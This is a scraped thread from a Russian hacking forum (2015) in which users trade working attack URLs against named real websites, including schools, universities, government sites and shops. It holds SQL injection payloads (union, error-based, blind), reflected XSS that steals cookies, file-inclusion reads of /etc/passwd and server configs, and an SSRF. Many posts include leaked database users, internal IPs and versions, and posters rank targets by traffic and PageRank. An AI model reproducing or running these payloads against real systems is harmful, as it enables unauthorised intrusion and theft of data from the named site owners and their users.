https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:mmpris.ru (https://www.google.com/search?q=site%3Aantichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:mmpris.ru)
http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27
private_static
20.05.2015, 02:37
http://bonnika27.com/girl.php?id=-11+UNION+SELECT+1,2,3,4,5,user(),version(),8,9,10 (http://bonnika27.com/girl.php?id=-11+UNION+SELECT+1,2,3,4,5,user%28%29,version%28%29 ,8,9,10)
вес:bonnikac_user@localhost
грудь:5.1.73-cll
http://www.childrensgarden.dk/curriculum.php?id=5 union select 1,group_concat(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES (http://www.childrensgarden.dk/curriculum.php?id=5%20union%20select%201,group_con cat(TABLE_NAME),3%20FROM%20INFORMATION_SCHEMA.TABL ES)
5.5.29-0ubuntu0.12.04.1
childensgarden@localhost
childrensgarden_dk
http://www.eupraxis.it/curriculum.p...ncat(version(),0x3a,user(),0x3a,dat abase()),8 (http://www.eupraxis.it/curriculum.php?id=-5%20union%20select%201,2,3,4,5,6,group_concat(vers ion(),0x3a,user(),0x3a,database()),8)
5.5.42-37.1-log
Sql533637@62.149.130.42
Sql533637_1
Bezlishke
20.05.2015, 13:58
↑ (https://antichat.live/posts/3849854/)
dsn: 'mysql:host=localhos -Если я не ошибаюсь, то это ключевая строка
Суть вопроса была не в этом.
http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+
5.1.73-2+squeeze+build1+1-log
abrasifsbase
abrasifsbase@10.0.65.161
Слепые SQL
nightclub-spb.ru/show_club.php?id=115 (https://vk.com/away.php?utf=1&to=http%3A%2F%2Fnightclub-spb.ru%2Fshow_club.php%3Fid%3D115)' AND substring(@@version, 1, 1)='5
tushinec.ru/index.php?news_read=1310 (https://vk.com/away.php?utf=1&to=http%3A%2F%2Ftushinec.ru%2Findex.php%3Fnews_rea d%3D1310)' AND substring(@@version, 1, 1)='5
XSS http://tigercraft.org/index.php/forumbb/search.php?keywords=">alert() (http://tigercraft.org/index.php/forumbb/search.php?keywords=%22%3E%3Cscript%3Ealert%28%29% 3C/script%3E)
Егорыч+++
21.05.2015, 18:42
↑ (https://antichat.live/posts/3850378/)
XSS
http://tigercraft.org/index.php/forumbb/search.php?keywords=">alert() (http://tigercraft.org/index.php/forumbb/search.php?keywords=%22%3E%3Cscript%3Ealert%28%29% 3C/script%3E)
Пассивные xss тут надо публиковать с описанием того как её можно использовать на уязвимом ресурсе.
private_static
21.05.2015, 18:50
.SpoilerTarget" type="button">Spoiler: инклуд
http://www.antiled.biz/index.php?lang=ru&menu=ss/../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
http://www.roadarmor.com/full-news.php?id=-5 union select 1,2,version(),4,5,6,7 (http://www.roadarmor.com/full-news.php?id=-5%20union%20select%201,2,version(),4,5,6,7)
PR 2
AR 950876
5.0.95
Шниперсон
21.05.2015, 23:53
http://www.additivealert.com.au/productdetail.php?pid=3+union+select+1,2,version() ,4,5,6,7,8 (http://www.additivealert.com.au/productdetail.php?pid=3+union+select+1,2,version%2 8%29,4,5,6,7,8)
ще я имею задать вопрос ! Как их кошерно искать ???
quaoar.su/index.php?article_id=7%20union%20select%20concat(u ser(),0x3a,database(),0x3a,version())&chapter_id=6&volume_id=1
quaoarsu@localhost:quaoarsu:5.5.40-log
travel-rhodes.com/article.php?article_id=-7%20union%20select%201,2,3,concat(user(),0x3a,data base(),0x3a,version()),5,6,7,8,9--+f
ttrhodes_mar@localhost:ttrhodes_rhodes:5.1.73-cll
PR4
fbc.scuegypt.edu.eg/fixed.php?id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6 (http://www.fbc.scuegypt.edu.eg/fixed.php?id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6)
gisUsr@localhost:gis:5.0.67-community-nt
PR2
mormonlit.byu.edu/lit_work.php?w_id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5
ldslit@localhost:ldslit:5.5.39
PR4
kingbeef
24.05.2015, 03:47
XSS
https://poisk.ngs.ru/?q=\x3C\x2Ftitle\x3E\x3Cscript\x3Ealert\x28\x27kin gbeef\x27\x29\x3C\x2Fscript\x3E®ion=50&mode=2&url=d3d3LmNvZGVuZXQucnU=
http://www.dutchaero.nl/index.php?catid=3&id=-7%20union%20select%201,2,3,4,concat%28user%28%29,0 x3a,database%28%29,0x3a,version%28%29%29,6--
https://www.althorp.com/visits_giftshop_detail.php?catid=-1%27+or+1+group+by+mid%28user%28%29,rand%280%29|0, 64%29+having+avg%280%29+--+
http://www.parskado.com/category.php?CATID=2%20union%20select%20concat%28u ser%28%29,0x3a,database%28%29,0x3a,version%28%29%2 9,2--+-
Sql-inj (Blind)
http://erobank.ru/section/if(now()=sysdate(),sleep(0),0)/')%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))) nSVA)%20AND%20('BUui'='BUui'XOR(if(now()=sysdate() ,%20sleep(0),0))OR'%22XOR(if(now()=sysdate(),sleep (0),0))OR%22/
Долго думал, выкладывать ли этот сайт, все таки поделюсь. Довольно интересный инет магазин, с кучей полезных данных. Скуля слепая, поэтому руками крутить и не брался. Легко раскручивается sqlmap'ом:
http://autoforsazh.ru/battery-search/?battery_brand=1&battery_capacity=;&battery_cold_start_current=;&battery_polarity=(select(0)from(select(sleep(0)))v )/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&items_per_page=36&item_part=&order=asc&request_url=battery-search&search_type=battery_param&size_height=1&size_length=1&size_tolerance=1&size_width=1&sort=price
SQL-inj (Blind):
http://kharkov.ua/poisk/searchresults.php3?category=395%20AND%203*2*1%3d6% 20AND%20601%3d601&mode=2
XSS:
http://kupitraf.com/index.php?type=1%22%3E%3Cscript%3Ealert%28document .cookie%29%3C/script%3E
SQLi
akulof.ru/modules/shop/category.php?id=-26 UNION ALL SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database() ,version()),6,7 --
alvora.lt/jobs.php?id=-7'%20union%20select%201,2,3,concat(user(),0x3a,dat abase(),0x3a,version())--+f
ТИЦ10 PR4
alvora_web_vart@localhost:alvora_database:5.5.39-cll-lve
volumeseattle.com/jobs.php?id=-7%20union%20select%201,concat(user(),0x3a,database (),0x3a,version())--+f
PR3
volumeseattle@184.168.27.206:volumeseattle:5.0.96-log
offestival.com/top.php?id=-2%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18&lang=en
PR4
offestiv_vasco@localhostffestiv_ffo:5.0.96-community-log
http://zabinfo.ru/person.php?pageid=person&idperson=-266 union select 1,user(),version(),4,database(),6,7,8,9,10,11,12,1 3;%00
User: zabftp@localhost
Version: 5.1.48-log
Database: zia_news
ТИЦ: 2100
PR: 4
http://museumpereslavl.ru/event.php?id=-377 union select 1,group_concat(user(),0x3c62723e,version(),0x3c627 23e,database()),3,4,5,6,7,8,9--+
User: u184264@10.8.3.230
Version: 5.5.35-1+wheezy1+mh1-log
Database: u184264
ТИЦ: 190
PR: 4
http://www.ukvz.ru/catalogue/view.php?id=-81' union select 1,2,3,4,group_concat(user(),0x3c62723e,version(),0 x3c62723e,database()),6,7,8,9,10,11,12,13,14,15,16--+&ggid=1&flag=0
User: ukvz@localhost
Version: 5.1.73-log
Database: ukvz
ТИЦ: 100
PR: 4
SQLi
http://www.barryowen.com/toys.php?catID=14&subCatID=-49+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28 %29,0x3a,database%28%29,0x3a,version%28%29%29,11,1 2,13,14,15,16+--+
http://www.createwindow.com/store/crystals/index.php?CatID=-12+or+1+group+by+mid%28user%28%29,rand%280%29|0,64 %29+having+avg%280%29+--+
http://wpcreek.com/products.php?catid=101+union+select+1,2,3,concat%2 8user%28%29,0x3a,database%28%29,0x3a,version%28%29 %29,5,6,7+--+-
http://www.ck-oda.gov.ua/index.php?article=-254 union select 1,concat(0x3c666f6e7420636f6c6f723d7265643e,0x3e3e 20496e6a65637420627920526f73736f203c3c,0x3c2f666f6 e743e,0x3c62723e,0x557365723a,user(),0x3c62723e,0x 56657273696f6e3a,version(),0x3c62723e,0x4461746162 6173653a,database(),0x3c62723e),3,4--+
User: oda@localhost
Version: 5.1.60
Database: oda
ТИЦ: 1200
PR: 5
http://mehfilentertainment.com/even...mn_name,3,4,5+from+information_schema.colum ns (http://mehfilentertainment.com/events.php?id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns)
http://www.astorialic.org/events.ph...5,6,7,8,9,10+from+information_schema.t ables-- (http://www.astorialic.org/events.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_schema.tables--)
http://www.essaygifts.co.za/catalog...ame,3,4,5,6+FROM+information_schema.colu mns-- (http://www.essaygifts.co.za/catalogue-list.php?id=-1+union+select+1,column_name,3,4,5,6+FROM+informat ion_schema.columns--)
http://www.editionsdusandre.com/boo...,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1 (http://www.editionsdusandre.com/book_details.php?id=-1+union+select+1,2,group_concat(version(),user()), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31)
http://www.wailana.com.au/catalog/p...,7,8,9,10,11+from+information_schema.tables-- (http://www.wailana.com.au/catalog/product.php?pid=1+union+select+1,2,3,4,group_conca t(table_name),6,7,8,9,10,11+from+information_schem a.tables--)
Большая просьба не постить по одной уязвимости в одном сообщении. Если с Вашего поста в теме никто не писал, отредактируйте. Не стоит думать, что так вы получите больше репутации
Еще совет: если это SQL, указывайте версию. Иногда пригождается проверить работу какого-либо вектора. Также, не забывайте обрамлять тегами CODE
BabaDook
31.05.2015, 00:09
Что-то я пока ничего не придумал, что с ним делать
http://ankontr.if.ua/?a_id=6395&page=../../../../../../../../../../etc/passwd%00&type=info
Mister_Bert0ni
31.05.2015, 01:09
Сосдай пейлоад с возможными путями /threads/324564/ (https://antichat.live/threads/324564/) и пройтись Burp Suite в Intruder-e
Вот конфиг апача
http://ankontr.if.ua/?a_id=6395&page=../../../../../etc/apache2/apache2.conf%00
MySQL
http://ankontr.if.ua/?a_id=6395&page=../../../../../%2fetc%2fmysql%2fmy.cnf%00
http://www.keuka.edu/apps/m_directory/person.php
?id=-890' union select 1,2,concat(0x3c666f6e742020636f6c6f723d22726564222 0666163653d2247656f72676961223e,0x3e3e20496e6a6563 7420627920526f73736f203c3c,0x3c2f666f6e743e3c62723 e,0x557365723a20,user(),0x3c62723e,0x56657273696f6 e3a20,version(),0x3c62723e,0x44617461626173653a20, database()),4,5,6,7,8,9,10,11,12--+
User: keukawe_www@localhost
Version: 5.1.72-ius
Database: keukawe_directory 6 7
ТИЦ: 10
PR: 6
Mister_Bert0ni
31.05.2015, 02:34
↑ (https://antichat.live/posts/3853630/)
это я знаю ))
http://ankontr.if.ua/?a_id=6395&page=../../../../../../var/log/lastlog�
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/run/utmp�
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/wtmp� -- этот пишет логин и ip и упоминает ftpd.Стоит попробывать конект через ftpd и качестве логина попробовать указать .
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/xferlog� - довольно большой лог.Гугл говорит что это лог vsftpd сервера
XSS
http://24log.ru/join.php?c=4&d=6&project_id=®ister=yes&sth=0&t=41-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%2 8document.cookie%29%3C/ScRiPt
еще
dbo464376343@74.208.16.31
5.1.73-log
http://www.southernpowerlifting.com/form.php?id=-1+union+select+group_concat(table_name),2+from+inf ormation_schema.tables—+
XSS
http://russki-mat.net/argot/poisk.php?c=lem&q=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert %28123%29%3C/ScRiPt%3E
SQL-inj (Error Based)
Banner: '5.1.41-log'
http://viko-ias.ru/o_kompanii/novosti/?ajax=1&tag=-5118%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x7 1706b7a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28 %29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0 x7162627071%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVI NG%20MIN%280%29%23)%2cconcat((select%20concat(CHAR (52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(78)%2cCHAR(121) %2cCHAR(78)%2cCHAR(107)%2cCHAR(103)%2cCHAR(54)%2cC HAR(66)%2cCHAR(57))%20from%20information_schema.ta bles%20limit%200%2c1)%2cfloor(rand(0)2))x%20from%2 0information_schema.tables%20group%20by%20x)a)and% 22
XSS:
http://telenet.dn.ua/check/index.php/%22%3E%3Cscript%3Ealert%28%22Filipp%20Mustang%22%2 9%3C/script%3E
http://onlinederabassi.com/check.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14-- (http://onlinederabassi.com/check.php?id=-1+union+select+1,pwd,adminname,4,5,userid,7,8,9,10 ,11,12,13,14+from+adminlog--)
LFI:
http://krivbassham.org.ua/index.php?action=views&getbg=../../../../../../../../../../etc/passwd&page=blogs
XSS:
http://iona.kiev.ua/photo.php?menu=misc%27%22%28%29%26%25%3Cacx%3E%3CS cRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&photo=troitsa1520.jpg
SQL-inj (Blind)
http://gothart.com.ua/stat/book/show/?id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Cdxh)
www.tacamateurs.com (http://www.tacamateurs.com)
http://www.tacamateurs.com/cgi-bin/signup/signup3.pl?famaction=form&network=TAC1&tacid=221%27+and(select+1+from(select+count(*),con cat((select+(select+database())+from+%60informatio n_schema%60.tables+limit+0,1),floor(rand(0)*2))x+f rom+%60information_schema%60.tables+group+by+x)a)+ and+%271%27=%271
SSRF:
http://fcgoverla.uz.ua/lib/imageresize.php?cache=1&h=375&imgurl=ftp://test.antichat/image.ssrf&w=500
http://dazo.gov.ua/index.php?id=query&sid=-15 union select concat(0x3c623e3c666f6e7420636f6c6f723d72656420666 163653d47656f726769613e,0x3e3e496e6a65637420627920 526f73736f203c3c,0x3c62723e,0x3c2f623e3c2f666f6e74 3e,0x557365723a20,user(),0x3c62723e,0x56657273696f 6e3a20,version(),0x3c62723e,0x44617461626173653a20 ,database())--+
User: dazo_yura@localhost
Version: 5.5.41-0ubuntu0.14.04.1
Database: dazo_dazo
ТИЦ: 20
PR: 4
www.the-ice-man.co.uk (http://www.the-ice-man.co.uk)
http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
Префикс таблиц: 'theqice_'
inurl:"prodisp.php?prodcatind"
Чет я не понял, пофиксили чтоли уже;/
SQL-inj
http://chorus.kh.ua/album.php?id=-1+UNION+SELECT+1,user(),3+--+
http://www.ruslang.ru/agens.php?id=999999.9'+union+all+select+1,2,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),4,5,6,7,8+--+
ТИц 1400
PR 5
5.5.41-MariaDB
http://www.komod.ru/garniture/search/?query=99'+or+1=(sElEcT+1+fRoM(sElEcT+count(*),cOn CaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x21 7e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1
ТИц 900
PR 3
Li 6к трафа
5.6.15-63.0-log
http://dynatone.ru/newslist.php?ngr=2'+and(sElEcT+1+fRoM(sElEcT+count (*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE (),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+f RoM+information_schema.tAbLeS+lImIt+0,1),floor(ran d(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+ x)a)+and+'1'='1
ТИц 1700
PR 3
Li 3к трафа
5.1.63-0+squeeze1
http://www.auto-magnitola.ru/auto/index.php?firma=9'+union+all+select+concat_ws(0x3a ,version(),database(),user(),@@version_compile_os) ,2,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
ТИц 450
PR 4
Alexa 300к
5.5.33-log (http://www.auto-magnitola.ru/auto/model.php?mode=5.5.33-log:wwwmusiccarru:musiccar@localhost:FreeBSD9.1)
Li 5к трафа
domkom.ru/admin/stuffs_add.php?id_type=7'+union+select+concat_ws(0 x3a,version(),database(),user(),@@version_compile_ os),2,3,4,5,6+--+
ТИц 275
PR 3
5.6.15-63.0-log
http://www.province.ru/doska/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
CMS:Joomla
ТИц 1900
PR 5
LI скачет, но в основном 20к уников в день
5.1.49-3
kingbeef
14.06.2015, 14:04
↑ (https://antichat.live/posts/3858690/)
Хватит RU/UA ломать. В других доменных зонах есть миллионы сайтов.
Как скажете.
http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k (http://iunisa.unisa.it/podcast-1061'+and+0+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12,13,14,15,16--+k)
Файл скачивается
↑ (https://antichat.live/posts/3858701/)
Как скажете.
http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k (http://iunisa.unisa.it/podcast-1061'+and+0+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12,13,14,15,16--+k)
Файл скачивается
по моему следует запретить постить тут уязвимости тем, кто давно может делать это в специально отведенных темах что висят в профильных разделах
Регистрация: 8.04.2010
Сообщения:
385 (https://antichat.live/search/member/user_id/120216/)
может ты уже перерос песочницу??
↑ (https://antichat.live/posts/3859779/)
Только вот я не понимаю где будет писать/отображать версию БД?
в файле который ты скачал:
1) в названии файла 5.1.23-rc-community-log.txt
2) ошибка с раскрытием в тексте файла
Warning: filesize() [function.filesize]: stat failed for
5.1.23-rc-community-log
in /var/www/html/iunisa/pod_proxy.php on line 166
Notice: Undefined index: HTTP_REFERER in /var/www/html/iunisa/pod_proxy.php on line 26
Notice: Undefined index: cat_event in /var/www/html/iunisa/pod_proxy.php on line 180
Warning: readfile(
http://iunisa.unisa.it/
5.1.23-rc-community-log
) [function.readfile]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in /var/www/html/iunisa/pod_proxy.php on line 188
XSS:
http://www.62.ua/banks/type/1?bank_id=1&income_statement=1&sum=10000%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3 Ealert%28document.cookie%29%3C/ScRiPt%3E&term=1
http://www.shkola-smertina.ru/tournaments/?season=">alert(100) (http://www.shkola-smertina.ru/tournaments/?season=%22%3E%3Cscript%3Ealert%28100%29%3C/script%3E)
http://www.hafen-fotos.de/keyphoto/viewphoto.php?foto=49200703071515.jpg&userhelp=on&helpid=-86 union select 1,concat(0x3c666f6e7420636f6c6f723d726564206661636 53d47656f726769613e,0x3c623e,0x3e3e20496e6a6563742 0627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0 x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657 273696f6e3a20,version(),0x3c62723e,0x4461746162617 3653a20,database()),3--+
User: web310@localhost
Version: 5.1.73
Database: usr_web310_1
PR: 3
http://www.innoworks.org/newinno/bios2.php?staff_id=-64 /*!50000union*/ select 1,concat(0x3c666f6e7420636f6c6f723d726564206661636 53d47656f726769613e,0x3c623e,0x3e3e20496e6a6563742 0627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0 x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657 273696f6e3a20,version(),0x3c62723e,0x4461746162617 3653a20,database()),3,4,5,6,7,8,9,10,11,12,13,14--+
User: innowork_admin@localhost
Version: 5.5.41-cll-lve
Database: innowork_people
PR: 5
http://www.arndt-sowi.de/webquest/show.php?id=-40' union select concat(0x3c666f6e7420636f6c6f723d72656420666163653 d47656f726769613e,0x3c623e,0x3e3e20496e6a656374206 27920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3 c62723e,0x557365723a20,user(),0x3c62723e,0x5665727 3696f6e3a20,version(),0x3c62723e,0x446174616261736 53a20,database()),2,3,4,5,6,7,8,9,10,11--+
User: web33@localhost
Version: 5.5.42
Database: usr_web33_2
PR: 3
http://www.solo-musica.de/show.php?id=-4' union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d72656420666 163653d47656f726769613e,0x3c623e,0x3e3e20496e6a656 37420627920526f73736f203c3c,0x3c2f623e3c2f666f6e74 3e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x5 6657273696f6e3a20,version(),0x3c62723e,0x446174616 26173653a20,database()),5--+
User: dbo354230028@195.20.225.33
Version: 5.1.73-log
Database: db354230028
PR: 3
http://www.lernort-labor.de/events.show.php?ID=-153 union select 1,2,3,4,5,6,concat(0x3c666f6e7420636f6c6f723d72656 420666163653d47656f726769613e,0x3c623e,0x3e3e20496 e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f66 6f6e743e,0x3c62723e,0x557365723a20,user(),0x3c6272 3e,0x56657273696f6e3a20,version(),0x3c62723e,0x446 17461626173653a20,database()),8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25--+
User: lerjxdou@localhost
Version: 4.1.26
Database: usrdb_lerjxdou
PR: 6
http://www.leong-leong.com/news.php?id=999999.9+union+all+select+1,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),3,4,5
5.1.72-REL14.10
PR:4
https://www.naturesplus.com/sourceoflife/products/productDetail.php?id=999999.9+union+all+select+con cat_ws(0x3a,version(),database(),user(),@@version_ compile_os),2,3,4,5,6
5.1.70-log
PR:4
http://pharm.buu.ac.th/News_view.php?id=999999.9'+union+all+select+1,2,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),4,5,6,7+and+'0'='0
5.0.45
PR:4
SQL-inj:
http://bezgazet.dp.ua/?act=mode&mode=0%22%20AND%20%28SELECT%204782%20FROM%28SELECT %20COUNT%28%2A%29%2CCONCAT%280x717a707671%2C%28MID %28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29 %2C0x20%29%29%2C1%2C50%29%29%2C0x717a706a71%2CFLOO R%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SC HEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND% 20%22ClCs%22%3D%22ClCs
http://www.alternativenergia.hu/wp-content/themes/alternativenergia/tudjmegtobbet.php?catid=85+or+1=9+union+all+select +concat_ws(0x3a,version(),database(),user(),@@vers ion_compile_os),2,3,4,5,6,7,8--
PR - 5
5.5.35-0+wheezy1-log
вывод в исходном коде
Вкусности-приятности
http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x 3a,version(),database(),user(),@@version_compile_o s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'=' 0
5.5.41-0
PR-5
Индусы
http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7
5.5.42-cll
PR-3
http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select% 201,concat_ws(0x3a,version(),database(),user(),@@v ersion_compile_os),3,4,5,6,7,8,9,10,11,12
5.1.65
http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%20 1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4
5.0.96-log
PR-3
http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fR oM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x 217e21,user(),0x217e21,version(),0x217e21,database ()))+fRoM+information_schema.tAbLeS+lImIt+0,1),flo or(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRo Up+bY+x)a)+and+'1'='1
5.5.30
PR-5
http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT +count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,ve rsion(),0x217e21))+fRoM+information_schema.tAbLeS+ lImIt+0,1),floor(rand(0)*2))x+fRoM+information_sch ema.tAbLeS+gRoUp+bY+x)a)
5.5.30
PR-4
http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+cou nt(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user() ,0x217e21,version(),0x217e21,database()))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1
Магазин ювелирных изделий
5.5.41-cll-lve
PR-3
semen6192
25.06.2015, 21:02
↑ (https://antichat.live/posts/3862105/)
Вкусности-приятности
